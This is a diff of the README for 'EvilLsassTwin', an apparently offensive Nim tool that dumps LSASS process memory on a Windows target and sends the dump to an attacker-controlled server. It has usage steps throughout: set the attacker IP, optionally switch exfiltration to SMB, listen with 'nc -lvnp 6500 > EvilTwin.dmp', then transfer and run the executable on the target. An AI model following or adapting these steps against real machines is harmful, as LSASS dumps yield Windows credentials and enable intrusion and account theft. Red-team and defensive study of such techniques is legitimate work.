RePRGM/Nimperiments/EvilLsassTwin/README.md

 1. Install Dependencies with `nim dependencies` or through Nimble package manager (Atlas not yet tested)
 2. Edit line 5  in `EvilLsassTwin.nim` file to include your server's (attacker machine) IP address.
 Optionally: You may change the port number on line 6 as well.
 If you do change the port, it needs to be changed within the `EvilTwinServer.nim` file as well.
+3. (Optional) If you want to exfiltrate the dumpfile using SMB instead of a raw socket, edit lines 7 to include the SMB Share name, line 9 (`const useSMB`) to be true and line 10 (`const useRawSocket`) to be false.
-3. Compile the project with `nim build`. _Note: this assumes EvilTwinServer will be run on a Linux machine.
+4. Compile the project with `nim build`. _Note: this assumes EvilTwinServer will be run on a Linux machine.
 Manual compilation required otherwise_
-4. `chmod +x EvilTwinServer && ./EvilTwinServer` Alternatively: `nc -lvnp 6500 > EvilTwin.dmp`
+5. `chmod +x EvilTwinServer && ./EvilTwinServer` Alternatively: `nc -lvnp 6500 > EvilTwin.dmp`
-5. Transfer EvilLsassTwin.exe to (Windows) target machine and Run.
+6. Transfer EvilLsassTwin.exe to (Windows) target machine and Run.

 # Resources
 [Bill Demirkapi - Abusing Windows Implemention of Fork for Stealthy Memory Operations](https://billdemirkapi.me/abusing-windows-implementation-of-fork-for-stealthy-memory-operations/)